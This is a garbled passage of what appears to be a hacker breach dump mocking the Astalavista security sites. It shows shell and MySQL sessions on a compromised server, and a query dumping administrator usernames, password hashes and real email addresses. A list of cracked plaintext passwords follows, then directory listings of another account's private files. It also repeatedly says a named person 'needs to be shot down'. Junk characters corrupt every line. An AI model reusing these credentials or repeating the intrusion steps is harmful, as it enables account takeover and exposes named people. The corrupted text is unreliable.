<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>% n* N$ ?% G( w2 x+ v: r; \
<docs>http://blogs.law.harvard.edu/tech/rss</docs>6 D3 L0 N' v5 W- l
<generator>Astalavista.com</generator>
# t& ~6 C, N' T. G! Z: D+ ? <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
. @) j: f2 z8 Q* M </channel>6 u$ m4 | \1 _3 S5 u+ [
</rss>’;/ y; L* C }' r+ D' B
4 S& e& k6 V# [" N
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
7 i7 o3 F% E6 a unlink (FULLPATH . ‘/feed/exploits.xml’);
$ a( Z. Q0 d; R- e! N" w5 L% ]9 e }
: C4 Q5 s9 ~" B6 G/ ~- r; T* {0 I( ?( Q5 {* N0 J6 X0 T
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);5 @3 B4 W7 O. n6 J, Y
[snip]
3 g& R: v2 A5 y. _( }
0 B- M/ i% w# k0 wsh-3.2$ cat exploits.sh
, {; K; u [( M) _. W8 S#!/bin/sh6 G! U v# q+ W: ^
& R( w9 j* c1 d6 n5 i9 a
###########################################################% i" y% q' [% J! p1 \7 H" Y
# #
# i3 O; H$ t: u/ ], A% @" v# Title: milw0rm exploits adder #) i/ w9 Q( U3 h4 W
# Description: Add all milw0rm exploits to the #. u$ v* J! q+ t1 p2 X1 G' |
# Astalavista.com database #
% c: F5 W4 @( l0 Q: l$ ^/ l5 t/ z# #3 K+ }6 o, [* R, n6 Y" }7 G5 N6 \
# Company: Astalavista Group #
0 n+ {+ h8 z% G9 U# U5 O# Author: Paulo M. Santos #
8 s2 N0 w% } u# ?& ^# E-Mail: 链接标记paulo.santos@astalavista.ch #% t/ `' g$ M+ Z* x! R
# #
( s2 U+ W E# t2 v6 F1 L Y! h###########################################################
& v# Q0 R j: k3 c6 K% z0 H Y, S5 k5 j0 ?4 q3 E9 O0 @3 R
# path" {1 H2 x; }% @2 e
this_path=/home/com/public_html/modifications/cronjobs6 M" x1 r+ O! y" H# S0 ^) _' f; W: ~
% ~1 z2 C0 O u# W! L4 U# change directory2 }( Q- P7 P8 d
cd $this_path
. g* X: k; g, G# ^/ r3 L1 x% ycd tmp/
0 `+ Y+ a0 I! l2 h6 [* c! i
" }% m& s+ C: U* f- r" ^5 g# delete files
. Y- S. ?, W* l, W. arm -rf milw0rm.tar.* &
- |% f% b# W( x8 B6 g! C7 z trm -rf milw0rm/ &+ n/ M" J* N L4 x R, v+ ^& N
8 x/ B+ v1 V! S$ r0 r
# wget milw0rm paket2 f. e7 j8 r7 s
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
5 [. i; r8 }! [0 {1 j9 b
8 T4 q' U! |0 ?- ~+ k+ x" E# extract milw0rm paket) B& [' w2 }; u2 ]* N; F+ A1 k
tar -xvf milw0rm.tar.bz2
B- A" _; r: L% B7 _& f4 H! b: t E+ N" @
# change owner0 b* r$ D1 z, }2 s2 j& N1 X6 C
chown -R com .! g; G3 O& ?6 }0 n7 l5 ~
chgrp -R com .7 _, s0 d# q( z0 x4 A/ |
. j7 I @. ]3 W0 A! u, d# execute php script
' O, O! H2 l/ R% Pcd $this_path
* _. m+ E, U/ K" e/ wphp -q exploits.php+ g: Q( ~1 U6 C3 `1 W
/ l3 N$ D' p( `% o1 J4 n9 [4 }/ p
# delete files
0 q, V- x$ y% }2 Z$ ]8 r2 Z' urm -rf tmp/milw0rm.tar.*
1 m4 t4 o w' T+ g. g, ]rm -rf tmp/milw0rm/
3 |; `+ V" y. o* _$ C6 q/ \( }9 K0 P# L0 O$ Z2 K
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
$ E8 {7 C% `$ f+ R9 f r+ zPaulo M. Santos needs to be shot down.
7 L, T( U) ~4 Z% [5 L
x5 M$ d. v5 Z# L' e# A) Omysql -u contrexxuser2 -p
- s: H3 P4 ^ U# A8 IEnter password:
( a9 G6 d N2 Z; f6 }* d- ]Welcome to the MySQL monitor. Commands end with ; or \g.0 Q# m8 E- H2 `. y- p
Your MySQL connection id is 261694
. J8 _ z& v" o5 Q! Q" aServer version: 5.0.45-community-log MySQL Community Edition (GPL)
) v! N" E4 \5 [1 K/ D' h& A1 o5 N, a/ E' M4 ^
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 E7 ]0 C/ h( j6 A' l+ n
/ D1 V2 @3 f+ }0 j& [mysql> show databases;7 o I0 j& `, F7 c+ I8 X0 s- l9 S
+——————–+
& ~. v! ~ D) b- @' C7 s| Database |
7 m( J5 L& h' [9 ^/ e- G! [+——————–+
5 m1 p5 ^/ @- ?1 L. d& p| information_schema |) i) H( w3 m N' F
| com_contrexx2 |
7 u. q# v# W7 M* [# j$ {% O# S8 N| com_contrexx2_live |0 k* d. A9 z( V' D8 Z8 C
| test |/ i( h: v0 i6 C% ]( o6 |
+——————–+
! O) p m, Z! t P2 X) m4 rows in set (0.00 sec)5 [, q1 a! i' U. H- X( b! Y
& p& x: S( i: ^/ T# I5 Y
mysql> use com_contrexx2_live9 M- Y8 Y; m; R* t8 W7 J" S( u* W
Database changed8 U& A, n7 N1 o& O, U
mysql> show tables;4 E v; Y* U/ }
+————————————————–+' {: S9 S% m D0 d
| Tables_in_com_contrexx2_live |- @/ k, S: J& ?8 w5 s: t) F
+————————————————–+2 f, C5 D% J4 k9 E6 G, S
| cc_banner_counter |" c( H8 ^5 a4 L7 W
| cc_search_counter |2 a: m9 n0 A" e p. `1 X5 X. ~% f
| contrexx_access_group_dynamic_ids |( B% {. d" G0 V! A8 s. [
| contrexx_access_group_static_ids |
1 i8 x/ D4 }3 @0 m( M/ k| contrexx_access_rel_user_group |/ _: t+ }( S: w {6 M
| contrexx_access_settings |
, ^8 }" N- C3 V& z/ V* Y| contrexx_access_user_attribute |
6 c0 E) h# N* c: _ c| contrexx_access_user_attribute_name | a8 @" {" w* o: O3 q8 {* U
| contrexx_access_user_attribute_value |
* b4 w" g* h& ^' ~* b. a| contrexx_access_user_core_attribute |, ]6 i2 Y1 l* v: u* t! m/ F
| contrexx_access_user_groups |
! B1 k3 ?. L) _& l/ G6 W% Q' q| contrexx_access_user_mail |
: S |1 q3 a/ ]; B. |7 b/ N( g| contrexx_access_user_profile |
) a, A9 {1 P! e' }6 Q# N| contrexx_access_user_title |
8 ~! S) }. l: j| contrexx_access_user_validity |8 ?' A8 j( z" I( A; p1 N9 e
| contrexx_access_users |
5 x# d5 C* ^; l+ S* x7 m: || contrexx_backend_areas |# o9 j2 }) A5 _3 _1 [
| contrexx_backups | f/ d. A) D& Y
| contrexx_content |
. g8 m) F2 P# I) P; S| contrexx_content_history |
$ _3 I/ Q) w0 `# C. G0 h _| contrexx_content_logfile |
6 F9 R3 ?% D/ a9 p2 U3 j3 H) i3 r% e| contrexx_content_navigation |1 l" y; i! e7 X k S
| contrexx_content_navigation_history |
6 O( ^) H( l& r7 I) ~| contrexx_ids |
$ U) s6 v- h+ p0 y- I/ [; m+ s| contrexx_languages |, I K, {7 x5 g$ W' B9 W
| contrexx_lib_country |3 ^3 E2 Y4 w* i4 _% d. R
| contrexx_log |- k& p7 i1 R8 {1 p8 S$ A
| contrexx_module_alias_source |
* X# u' v- s+ M# L6 E& S+ X| contrexx_module_alias_target |* S9 g1 V: K( j) P v |
| contrexx_module_block_blocks |
* j7 V0 e* ?$ S, d$ M% T| contrexx_module_block_rel_lang |
0 P0 I0 P6 e2 E4 Z( J| contrexx_module_block_rel_pages |2 y, Q) o# ]( n. |9 \& G( {2 j; ]* O
| contrexx_module_block_settings |) b) J7 u( B2 H1 y% U0 J* x
| contrexx_module_blog_categories |1 M. Q5 u" `6 ~
| contrexx_module_blog_comments |1 z# m$ T2 Z, i- v# m
| contrexx_module_blog_message_to_category |* I* O6 L5 Y3 d$ d/ `% f
| contrexx_module_blog_messages |
$ r2 Z1 w: H# O F| contrexx_module_blog_messages_lang |4 S* m4 }5 }/ x1 k: j) F1 t
| contrexx_module_blog_networks |" m! ], i8 K8 X' m( E
| contrexx_module_blog_networks_lang | m2 U3 o. o9 w3 W/ F' x
| contrexx_module_blog_settings |3 w: s4 G9 n! K8 a, ?( s% i' X& u, [
| contrexx_module_blog_votes |8 n H: V; {. w6 A
| contrexx_module_calendar |
" G: {" w3 a' E* h) |& u3 y5 S| contrexx_module_calendar_access |
1 V' J: ?/ j0 R2 X$ E- p7 B| contrexx_module_calendar_categories |
5 e: F- e, S7 o& n5 F| contrexx_module_calendar_form_data |! O( ~3 J s& r. W% E5 A
| contrexx_module_calendar_form_fields |0 W/ w2 |" T; E5 i# Y: p4 V
| contrexx_module_calendar_registrations |) T0 [; S& F0 [! l, v- O
| contrexx_module_calendar_settings |
; |! J2 N* w0 U4 N7 @| contrexx_module_calendar_style |
! N$ g' B! X0 T% x4 {7 J! e# Q| contrexx_module_contact_form |
3 D7 u! ?6 v* D( G" ?$ I| contrexx_module_contact_form_data |
L- D; }1 n* r# _/ G| contrexx_module_contact_form_field |
" ~6 n! v& D6 o, u) G0 W; W| contrexx_module_contact_settings |
5 v' R8 d. k6 W4 `" V0 K2 r0 `| contrexx_module_data_categories |
. B, {! t% a# v( G| contrexx_module_data_message_to_category |
, \; M- i( L3 n! B% Z0 `| contrexx_module_data_messages |. i0 H$ o0 O3 e3 N
| contrexx_module_data_messages_lang |
3 V4 V9 o$ z3 z! a9 z1 j% e% b| contrexx_module_data_placeholders |" r8 G; g+ D* k6 e" d0 E* h
| contrexx_module_data_settings |
- p/ ]/ C# {4 c3 a7 K. c| contrexx_module_directory_access |; `5 h3 p# p0 n
| contrexx_module_directory_categories |
& K& o4 B( N D/ e| contrexx_module_directory_dir |1 j) {: b+ x; S/ D4 u' J0 `
| contrexx_module_directory_inputfields |: @! c) @3 O2 z* ^, D i
| contrexx_module_directory_levels |2 W3 b$ j8 D+ F- O' [: w+ S7 ~
| contrexx_module_directory_mail |; ~; P0 O. W0 D
| contrexx_module_directory_rel_dir_cat |
# P/ D5 Q5 T3 A) j| contrexx_module_directory_rel_dir_level |
# o- w+ \5 e% a. s; g8 w. n# G: C| contrexx_module_directory_settings |1 n7 Y7 T5 |4 g) e8 B* Z; I3 o
| contrexx_module_directory_settings_google |
( D% m" @+ R; i/ J| contrexx_module_directory_vote |
% b& L) h& t1 \1 T| contrexx_module_docsys |
/ i; {. ]( x3 m& y; S3 q. i. X| contrexx_module_docsys_categories |( L; S7 n3 {' u( T: @
| contrexx_module_egov_configuration |3 D4 n; D& ?2 F. c" m+ U0 c
| contrexx_module_egov_orders |) \. v* A" N; w( t
| contrexx_module_egov_product_calendar |" T* }5 N3 `" `* h" I) n
| contrexx_module_egov_product_fields |
( E2 M; v8 A; B1 Q| contrexx_module_egov_products |! K" |" I; U5 _" X
| contrexx_module_egov_settings |
; o ?* `( h4 s" M; ?| contrexx_module_exploits |
$ K7 Y% ?$ n* C$ j7 j8 @| contrexx_module_exploits_categories |6 l/ G8 j6 h* u: C1 }
| contrexx_module_feed_category |
; y- B# `8 f: S& Q" T- n1 h| contrexx_module_feed_news |- b" Q& j/ y. m! c( [
| contrexx_module_feed_newsml_association |
- e: W$ F- W# `6 ?1 c. h! r2 t5 f| contrexx_module_feed_newsml_categories |
% h0 J0 q# ~& o9 a' O| contrexx_module_feed_newsml_documents |' D/ \. w& `' l) j# R3 v
| contrexx_module_feed_newsml_providers |
) j u; h4 P. y# f6 g| contrexx_module_forum_access |0 g+ @- N' W8 k
| contrexx_module_forum_categories |
( Q2 G: }; ~6 I. p, r1 {| contrexx_module_forum_categories_lang |, [7 q8 E& [7 {" `4 X L8 t8 {/ L
| contrexx_module_forum_notification |
/ q2 s" ^8 ~) J: _! c; o| contrexx_module_forum_postings |
( j2 |. C: D9 u| contrexx_module_forum_rating |
7 ~9 W7 ~: P9 Q8 I4 D+ A| contrexx_module_forum_settings |
! M/ b4 h- M! t+ t( h3 A- K/ N" \. {| contrexx_module_forum_statistics |
@) m8 u9 r {/ p| contrexx_module_gallery_categories |
, ^+ ^7 R/ x7 C+ V. Q| contrexx_module_gallery_comments |
1 y* s: V* n: V( @| contrexx_module_gallery_language |
- ]5 {1 f6 U9 W# x* f9 ^% Q1 ~| contrexx_module_gallery_language_pics |) @1 K; X" j9 t% x4 v; h0 j
| contrexx_module_gallery_pictures |0 {: |# v6 |5 ?7 Y& N* B" `5 Q6 |
| contrexx_module_gallery_settings |) S: `5 b" M6 O9 U& k: R: t
| contrexx_module_gallery_votes |
& T; u6 k+ S6 I6 `| contrexx_module_guestbook |6 ~1 F& b) M& [
| contrexx_module_guestbook_settings |- S' W5 f' p) T1 A
| contrexx_module_livecam |3 J0 e8 L( T! ~/ t
| contrexx_module_livecam_settings |
- [" H1 [/ f: W# W| contrexx_module_market |
; b! g5 A. I6 t+ W* P+ K5 K! R| contrexx_module_market_access |
# W3 \+ G7 m7 S$ V0 @| contrexx_module_market_categories |/ C9 b( ?7 t+ U
| contrexx_module_market_mail |
& {1 g2 I0 C; v- v5 f. i2 s" y7 W| contrexx_module_market_paypal |) a' S; I' B# z ]. X) V; k
| contrexx_module_market_settings |% x, a5 w; V+ r+ K8 |8 {' x
| contrexx_module_market_spez_fields |
$ G; O+ T" i/ E! O| contrexx_module_mediadir_access |
) o' r5 T' }+ c| contrexx_module_mediadir_categories |
" T8 u* S+ |/ |$ u( a- M' d9 s| contrexx_module_mediadir_comments |. ?5 b1 B% \- M7 }
| contrexx_module_mediadir_dir |
. U: H* U3 P" i| contrexx_module_mediadir_inputfields |
; m- n8 p% g/ t: V% G' K: s1 A| contrexx_module_mediadir_levels |. k& Y* y1 ?( M' m
| contrexx_module_mediadir_mail |
6 [) p1 [0 ?; i/ i- }8 }% z* F| contrexx_module_mediadir_rel_dir_cat |- z' O8 b( L/ Z/ j0 ^0 `
| contrexx_module_mediadir_rel_dir_level |2 S% E1 L/ n: w1 a, d: v! N
| contrexx_module_mediadir_reports |) u4 g2 b/ h* P) `8 R/ ?
| contrexx_module_mediadir_settings |
$ H7 `0 ? ~4 w. I0 \* X+ J& G| contrexx_module_mediadir_settings_google |
' B" [: e* N; l. || contrexx_module_mediadir_vote |: d c& w- g- L: z$ D
| contrexx_module_memberdir_directories |
- U8 p: v! e' u! U( k& l, @| contrexx_module_memberdir_name |; J5 B9 d. L' s: V, S9 F. O
| contrexx_module_memberdir_settings |) H6 @6 v2 J2 ]0 |0 }8 B: ?9 N
| contrexx_module_memberdir_values |
# O; v/ U& c! N: }| contrexx_module_nettools_allowed_groups |$ b8 a, B* X: b2 c
| contrexx_module_nettools_settings |
( v$ v4 P' N/ g& J+ S" d7 @| contrexx_module_news |
& Z* T# z" E' R* _" y% V- T| contrexx_module_news_access |
8 ]* J# Y2 z( Y/ B* H| contrexx_module_news_categories |
2 X y' W# Y0 G2 G. h6 }| contrexx_module_news_settings |: N- c f% X" F% a7 h1 H+ U
| contrexx_module_news_teaser_frame |
5 @% P/ ^" s/ E. J| contrexx_module_news_teaser_frame_templates |! R5 y- B' Y4 R. i. ^/ m
| contrexx_module_news_ticker |
' z( Z% v' s% C| contrexx_module_newsletter |- r9 w' r. H" F6 y
| contrexx_module_newsletter_attachment |1 V" @2 T6 c6 l. K4 t) n& l
| contrexx_module_newsletter_category |
$ t6 r- t: [! X% ]& C$ t6 _1 ^' |7 B| contrexx_module_newsletter_confirm_mail |4 u- _/ v- p! \
| contrexx_module_newsletter_rel_cat_news |. i4 u3 h2 F( {) [1 e" i; N" e
| contrexx_module_newsletter_rel_user_cat |
l' O* k! _% N& K| contrexx_module_newsletter_settings |# ]% `" g+ P6 C; u6 [( @0 S& J/ H
| contrexx_module_newsletter_template |
8 `$ x0 a; t* U% F| contrexx_module_newsletter_tmp_sending |
6 I/ J4 `5 w+ O" _0 [| contrexx_module_newsletter_user |
+ D+ K& t) N! Y; \ a2 L9 b| contrexx_module_newsletter_user_title |% s- {; ?6 X2 Z/ P! G& G
| contrexx_module_onlinetools_defaultports |
) G! I( S1 i3 b- _| contrexx_module_onlinetools_defaultports_back |" x I& L) S/ T, W3 t
| contrexx_module_onlinetools_geolitecity_blocks |9 {# l) D7 J5 E# A
| contrexx_module_onlinetools_geolitecity_country |
+ G4 P' m) Z( V! O% m( P/ n| contrexx_module_onlinetools_geolitecity_location |0 y8 z% y/ P9 m B
| contrexx_module_podcast_category |' `3 e" m% O6 x9 _
| contrexx_module_podcast_medium |
( E a1 R2 a( j6 J% U* i| contrexx_module_podcast_rel_category_lang |3 Y+ `0 h% `7 N& c( o
| contrexx_module_podcast_rel_medium_category |
' L* q- C6 _- Z| contrexx_module_podcast_settings |6 _3 P. T2 F, ?5 v3 B2 }. y
| contrexx_module_podcast_template |! i' n+ G4 V/ p
| contrexx_module_proxydb |
3 L+ ^+ O. n# |3 h. X- P| contrexx_module_recommend |. B1 g4 U: l {/ `$ D# y# R* u* i
| contrexx_module_repository |6 I4 U4 G1 p' G9 m( m( p4 K( z
| contrexx_module_securitynews_cats |' |, e7 d9 ^8 h) ]. [: Z
| contrexx_module_securitynews_feeds |
) a3 {" h9 u* J( v9 ?| contrexx_module_securitynews_news |
, x, ]) ~$ @& [' C9 j| contrexx_module_shop_categories |" w p9 E: d% n$ O V
| contrexx_module_shop_config |2 W% f0 q: f8 j
| contrexx_module_shop_countries |
+ X% }% T4 i/ ^# L% W| contrexx_module_shop_currencies |
7 a p% \: s, S. ?| contrexx_module_shop_customers |
: X- S S. [2 r# p. ~| contrexx_module_shop_importimg |
0 z F! V/ s# K0 E; [| contrexx_module_shop_lsv |: j# t( r7 O& {- N8 m8 F% W9 c
| contrexx_module_shop_mail |2 V2 p9 z2 o0 {7 c5 y% _
| contrexx_module_shop_mail_content |0 |' T+ H9 W2 t' a
| contrexx_module_shop_manufacturer |$ _ p) A: g' F/ R0 s5 [6 O% m G' m
| contrexx_module_shop_order_items |
4 B& e; D+ [1 d5 r& a| contrexx_module_shop_order_items_attributes |% T; i+ H; b* ^3 m* i
| contrexx_module_shop_orders |
+ H* X( ]1 B5 }/ S| contrexx_module_shop_payment | g2 g# H$ ?+ W9 N, t
| contrexx_module_shop_payment_processors |4 }. A }$ @5 p( B. V2 d5 Y
| contrexx_module_shop_pricelists |
. Z/ u* E, Q( I9 H| contrexx_module_shop_products |/ X4 e7 K, h) E# @9 p7 ?7 Y
| contrexx_module_shop_products_attributes |+ o8 H" L* |; m8 [9 R
| contrexx_module_shop_products_attributes_name |6 Z& | {/ F s2 w" t! F
| contrexx_module_shop_products_attributes_value |
2 v2 k2 Z) p1 I/ P$ m| contrexx_module_shop_products_downloads |
! b- }' P% ~& r| contrexx_module_shop_rel_countries |; }2 T7 }/ |* @' w3 U1 i
| contrexx_module_shop_rel_payment |
5 T$ E/ |! F" `! u- h; [| contrexx_module_shop_rel_shipment |
& d0 O [/ l' T7 ?/ o$ y| contrexx_module_shop_shipment_cost |
: F1 D: b0 D- P8 a| contrexx_module_shop_shipper |
" S9 r- q# A6 h2 y$ e* Z! l| contrexx_module_shop_vat |% G7 S6 o! q. Q Z
| contrexx_module_shop_zones |- f5 k/ S' @/ F1 [# P
| contrexx_module_u2u_address_list |
) K* s% W7 m9 B, T- a2 @| contrexx_module_u2u_message_log |
( p4 j% @% j! r+ a9 g: Q| contrexx_module_u2u_sent_messages |
; X n; \* w5 K) y; y| contrexx_module_u2u_settings |0 ~2 P D& q) P/ Q2 Q# T9 Z4 J
| contrexx_module_u2u_user_log |6 k8 G4 a4 U! q( K- q$ a
| contrexx_modules |) c' z1 }4 B; X# e7 O
| contrexx_sessions |4 _5 @8 N }3 U. q( y
| contrexx_settings |9 V1 n$ h; }: n4 }
| contrexx_settings_smtp |- A1 R- a( i4 e% H1 r
| contrexx_skins |
. b* R" z7 u: o7 v( z3 c+ H| contrexx_stats_browser |
7 Z/ P) o5 r3 ?; g9 c| contrexx_stats_colourdepth |' ]. [* }; L$ a; m
| contrexx_stats_config |+ f; J: I7 O: \! @: f% `
| contrexx_stats_country |; R. x4 C* `0 m. G4 S: N4 Q
| contrexx_stats_hostname |
3 r) Z* L) ~5 ]9 `6 |* z7 {, Y* G| contrexx_stats_javascript |
! v& t# Q2 s( R. |( c' S| contrexx_stats_operatingsystem |8 H# A( e( [' Z% R% Y
| contrexx_stats_referer |
! L" j& t' ]! F8 h9 ^" ~| contrexx_stats_requests |% T2 K) a1 L1 [6 C# T
| contrexx_stats_requests_summary |
; J3 R( J5 {6 M' H2 K| contrexx_stats_screenresolution |
7 E- h/ D$ Z0 \+ n| contrexx_stats_search |
. d9 ~! f: e1 P$ O| contrexx_stats_spiders |6 P( f( \7 U0 A1 u9 x! L
| contrexx_stats_spiders_summary |0 s- S& d+ `( E% `; C# p2 p
| contrexx_stats_visitors |
8 X) M t2 z1 y4 P7 n- B2 `' J) h| contrexx_stats_visitors_summary |
/ G I9 }* m7 H" i$ G+ a| contrexx_voting_additionaldata |0 `2 T5 y. n6 |. _
| contrexx_voting_email |. s6 U% G! G* a
| contrexx_voting_rel_email_system |# q. ]# H* ~3 k0 _: \
| contrexx_voting_results |, M8 k) I' p$ k+ i3 W$ x' ^
| contrexx_voting_system |
: G% b. z# J7 ~$ R| foo |) y# m) z% m k3 E$ r) }+ D3 O; Y
+————————————————–+7 ]" s$ p. Z2 a# f2 N# I
227 rows in set (0.01 sec)4 T- F" G8 ^ E: V+ B; R% |; t" o4 _- P
% t5 W' o4 x: g. n* Wmysql> select count(*) as skids from contrexx_access_users;
& B2 P+ \. j' X+——-+
+ `: j& u% X+ E" ?2 y5 B/ Z% o2 Z8 a| skids |& D8 X8 m2 e0 n1 R3 E5 g7 v
+——-+
- O* |! e' L5 b8 Y5 ^| 53699 |2 }- J7 r3 }9 ^: H: w) r/ [
+——-+
4 ^5 r( F) u* b+ W# f; e3 o5 x7 e B+ g1 row in set (0.00 sec)) A* e+ c+ O0 T; C6 w! ~6 U
2 R' _0 h7 E8 n$ J
mysql> describe contrexx_access_users;7 M6 }! y( X% S/ _4 B9 c
+——————+——————————————+——+—–+————–+—————-+
7 f$ e" O. r9 z) a: F F| Field | Type | Null | Key | Default | Extra |
3 U [# ?% b8 M P+——————+——————————————+——+—–+————–+—————-+% n* V# W; a3 R! F
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
# w& P5 a$ r0 Y5 W| is_admin | tinyint(1) unsigned | NO | | 0 | |8 m; I7 h/ w4 J- R! A/ M
| username | varchar(40) | YES | MUL | NULL | |3 N p9 C8 e. h! h
| password | varchar(32) | YES | | NULL | |
4 X9 I; F2 C$ s| regdate | int(14) unsigned | NO | | 0 | |
4 v- |$ E! t q2 |" {- Z| expiration | int(14) unsigned | NO | | 0 | |" ^0 a2 R& \) B R
| validity | int(10) unsigned | NO | | 0 | |
% T" D7 J; V# B; C' `| last_auth | int(14) unsigned | NO | | 0 | |
& m" `; z8 z8 G. j. {% F| last_activity | int(14) unsigned | NO | | 0 | |: k9 L( Z) k8 [5 d& U
| email | varchar(255) | YES | | NULL | |: y% r2 b% J# f
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |& n' D: R$ e# \4 _! N# {, I
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
( ?" z8 t5 [: f| backend_lang_id | int(2) unsigned | NO | | 0 | |
; j. j- \( A7 o7 |2 ^% w7 u9 l! O| active | tinyint(1) | NO | | 0 | |
+ C e& ?3 n Q+ E% r| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |% D/ S# ?: D" b
| restore_key | varchar(32) | NO | | | |4 B* O6 @6 D! U
| restore_key_time | int(14) unsigned | NO | | 0 | |, ~4 H9 j! ?# |* d' o6 l8 A
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
: |( S! p* i+ V6 ^$ m+——————+——————————————+——+—–+————–+—————-+
" O0 V1 p, m6 R( S) l18 rows in set (0.00 sec). U; j7 ?5 P( h) ^% m6 W
( e8 Q% o% r) x' |9 N# X2 p% T
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
s" M. l0 f; Y! Z) F2 w+————+———————————-+—————————–+1 X' Z4 N" }* p2 N; V% {; t
| username | password | email |
, f$ [9 j7 l' p! ~+————+———————————-+—————————–+5 X3 s6 [6 Q, Y. ?- v9 N+ C
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |8 ?$ v2 s0 K- ~# r
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |: U. u0 \0 U x3 |- `$ `
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
, v" U3 ^! R, `1 \| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |- Q, H! _2 {$ P- t5 K1 n
+————+———————————-+—————————–+
1 n/ k8 ]9 x( d4 b, z- X4 rows in set (0.04 sec)0 r6 I2 |7 m# e* y
- j: e3 K# K9 r% Qmysql> exit;9 P1 l2 r' G& s9 w, v/ S5 U
Bye: f$ Q5 c& f5 D# Y8 q# ~
, j/ t9 { v+ v& _[~] There you go, your “team of security and IT professionals” is a joke.2 _! _1 B$ s, _$ S
{* W, j' T, H6 |; z% \
+——————————+9 w5 t8 I. ^' l" I4 B. c
system:f82BN3+_*. s( J' O% p7 |+ V8 `. P$ o9 s/ K
Be1er0ph0r:belerophor4astacom
3 M6 _- l. ]* d& e, D1 s- Eprozac:asta4cms!
% F' [8 Q8 I# T. Ncommander:mpbdaagf6m
% X: h# \3 ]# A2 F$ ^sykadul:ak29eral9 i5 L3 t3 g6 B/ ?
+——————————+, E7 M7 \9 s( A7 D' f
, ~& a- \% T" i* \( W' n[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)+ {7 S8 o. G/ N+ Q! V7 O
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
9 E+ k( H! @5 `& U& b! n' p, R( ]! L+ ~, u/ B1 W2 W
[~] Lets move to astalavista.net now,
$ r! ^5 c+ \, E+ E6 i2 S/ X6 H$ e4 b% T9 h
From <链接标记[url]https://www.astalavista.net/[/url]>:9 ]) v N& S! z, Y
>> Everyone knows that the best defense is a good offense.
$ c5 S: Q7 i# T- O( N! p) v>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.# i2 Z* M) z9 q: a; e
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.# E* A6 W6 T9 w4 m) X; \5 @
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
9 M1 J$ P# p$ a) f5 q
$ ^, B9 q3 E$ K# f6 s) _7 ~>> Go ahead, try and hack our server . in a completely legal way!
2 X* |; D! }( [8 L>> Learn by doing: We offer our members tricky tasks and challenges on an+ l. C2 D. o& \. g* j
>> ongoing basis so you can test your knowledge and abilities. You can also: z- z" a) E9 k' i
>> demonstrate what you.ve mastered by taking part in regular hacker contests
5 _! j3 ?6 d8 f6 r>> and war games
1 c7 [9 C7 M- T5 u% w2 s2 M) |8 }
+ R8 o6 z3 p, B) q1 |; R4 g[~] Lets take a look there, after all… they are hack-proof, aren’t they?!. Z9 @. Q/ y5 k5 y. E$ ]! g6 Q4 S1 ?' m
) s- N8 l a2 d" m r Q[-] Tricky task: Find home dir of astalavista.net
, i" A* Q6 n" q) M6 V. u" |, W, H& G2 J2 r
sh-3.2$ ls -la ~astanet
' F' Z+ w% H9 }total 48
. M$ O$ M5 F# T; E3 Udrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
! t9 Z% p/ C/ U3 {/ Pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
; A6 y; @* q& q4 g) x% q- idrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
5 y% ?) V9 ]! P1 v8 {( c3 k-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history3 _2 Z Z6 m% q
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
5 C4 T+ @2 D9 h# ?) e-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
5 J% ?/ W8 ~; `: [/ Z-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc3 G0 C- C& T* N7 p9 ^( }
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
% m8 m c, f2 i* r3 ~/ M& q$ Udrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap" Z; L9 {+ F1 f# ^8 T3 \' \/ p/ }
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail1 c4 q9 B: `$ z* w9 J
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
; O D6 k( A1 i/ T* I. p: s+ ^( t-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
1 [/ w! y4 h+ v' f4 e. L
; V" s* @0 {1 O* m; Dsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/- u' T4 y8 u' }) V, z
sh-3.2$ ls -la% j7 j7 u) h( w) ^
total 2007 ` l9 E1 m8 n' A) v8 I6 T( a
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 . v1 i' e+ f3 h7 z: D
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
! W+ O) R; A0 ^ |+ a5 Jdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
, L! f# P9 e4 D6 mdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql4 C+ C; w7 ]5 B, W# g: E% J0 U( b
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
